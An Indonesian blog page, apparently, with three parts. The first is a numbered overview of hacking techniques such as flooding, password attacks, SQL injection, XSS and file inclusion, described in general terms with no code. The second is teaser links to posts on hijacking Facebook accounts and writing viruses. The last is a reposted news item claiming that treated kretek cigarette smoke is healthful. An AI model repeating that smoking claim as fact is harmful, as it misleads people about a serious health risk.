Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah. Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.

16. Remote File Inclusion (RFI)
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan RFI seorang attacker dapat menginclude kan file yang berada di luar server yang bersangkutan.


17. Local File Inclusion (LFI)
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan LFI seorang attacker dapat menginclude kan file yang berada di dalam server yang bersangkutan.

18. SQL injection
SQL injection adalah teknik yang memanfaatkan kesalahan penulisan query SQL pada suatu website sehingga seorang hacker bisa menginsert beberapa SQL statement ke ‘query’ dengan cara memanipulasi data input ke aplikasi tersebut. sql injection merupakan teknik lawas namun paling banyak digunakan oleh para dedemit maya.


19. Cross Site Scripting (XSS)
XSS dikenal juga dengan CSS adalah singkatan dari Cross Site Scripting. XSS adalah suatu metode memasukan code atau script HTML kedalam suatu website yang dijalankan melalui browser di client.

Read More..

Mengenal Lebih Jauh Dunia Cyber



CARA ORANG MENG-HACK FACEBOOK
Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para newbie yang terus saja bertanya-tanya.
Baca selengkapnya...


Teknik-Teknik Hacking Secara Umum
Teknik - teknik dibawah ini yang paling banyak digunakan oleh seorang Hacker
Baca selengkapnya...

Tips-tips agar kita terhindar dari ulah para hacker
1. Jangan pernah mengumbar alamat email secara berlebihan. Khususnya dengan orang-orang yang belum kita kenal.
Baca selengkapnya...

Membobol Password Facebook Menggunakan Flashdisk
da sejumlah tools yang berfungsi merecovery (memulihkan) password dari file tempatnya di simpan dengan memanfaatkan USB flashdisk
Baca selengkapnya...

Bikin Virus Dengan Notepad
Waktu lg browsing, ketemu nih keren nih
copy paste code-code yang ada di bawah ini ke dalam NOTEPAD

Baca selengkapnya...

Hacker Yang Berasal Dari Indonesia
Berikut merupakan para hacker yang berasaldari indonesia
Baca selengkapnya...

Perbedaan Hacker dan Cracker dan Akibatnya
sedikit tentang pengertian hacker dan cracker dengan sedikit perbedaan pada ruang lingkup kegiatannya, maka postingan kali ini akan saya beri penjesan lebih jauh tentang perbedaan keduanya.
Baca selengkapnya...

Read More..

Merokok Itu Menyehatkan.. :D

Metrotvnews.com, Surabaya: Asap rokok kretek yang mengandung kadar racun berbahaya, ternyata bisa dimodifikasi menjadi asap yang menyehatkan bagi manusia. Ada pendekatan Nano Biology yang digunakan. Demikian hasil sebuah penelitian yang dilakukan Guru Besar Biologi Sel Universitas Brawijaya Malang, Prof Dr Sutiman B. Sumitro, yang dirilis kepada wartawan, Selasa (4/1).

"Pendekatan Nano Biology sangat mungkin bisa menjinakkan asap kretek dan dimanfaatkan untuk kesehatan manusia, menyuburkan dan meningkatkan kualitas tanaman pangan," ujarnya.

Ia menjelaskan divine cigarette sebagai salah satu prototipe perlakuan terhadap rokok kretek menggunakan pendekatan Nano Biology, sudah mulai dirintis dan dikembangkan di Unibraw dan Lembaga Penelitian Peluruhan Radikal Bebas di Malang.

"Ternyata asap divine cigarette tidak menimbulkan efek sama sekali pada kelompok tikus percobaan. Bahkan, tikusnya menjadi lebih lincah dengan ransum makanan lebih sedikit dibandingkan tikus kontrol (tanpa divine cigarette)," jelasnya.

Selain itu, asap divine juga terbukti memacu pertumbuhan akar kecambah kedelai dan mendorong pertumbuhan lebih cepat, serta mampu menjadi penyedia elektron pada sistem transfer listrik dalam proses fisiologi normal.

Menurut Prof Sutiman, perlakuan Nano Biology juga membuat asap kretek menjadi tidak berbau dan menjadikan udara bersih sehingga sangat ramah lingkungan.

"Sayangnya, fakta ilmiah semacam ini tidak pernah diperhatikan pemerintah dan industri rokok kretek Indonesia, karena mereka tidak punya unit riset dan pengembangan produk yang memadai," katanya.

Ia menambahkan dari segi aset dan volume perdagangan rokok di Indonesia yang nilainya sangat besar, sebenarnya riset semacam ini cukup mudah untuk direalisasikan.

"Riset semacam ini bisa menghilangkan stigma negatif rokok kretek dan tentunya jauh lebih murah dibandingkan biaya yang harus dikeluarkan untuk lobi dan iklan yang konon anggarannya mencapai lebih dari 60 persen biaya produksi," tambah Sutiman.

Menurut dia, rokok kretek merupakan salah satu produk kearifan lokal yang masih tersisa, sebagai pemberi konstribusi nyata terhadap perekonomian nasional. Namun, rokok kretek terlanda isu sebagai produk tidak sehat tanpa didukung data hasil riset memadai. Isu tersebut berembus dari luar negeri dan dibangun melalui kegiatan riset asing.

"Departemen Kesehatan mengklaim rokok kretek merugikan kesehatan lewat rancangan peraturan pemerintah (RPP) tanpa upaya menakar dampaknya pada aspek lain secara seksama," ujar Sutiman.

Ia mengatakan RPP itu bisa memperlemah industri rokok dan mengingkari kenyataan bahwa merokok dan bercocok tanam tembakau merupakan budaya bangsa yang tidak mudah diubah.

Selain itu, RPP juga berisiko melemahkan sendi-sendi perekonomian dan sosial budaya bangsa.

"Rokok kretek sifatnya sangat kompleks, sarat kepentingan dan melibatkan nasib 24 juta orang, serta aset yang nilainya mencapai ratusan triliun rupiah setiap tahun," kata Sutiman

Read More..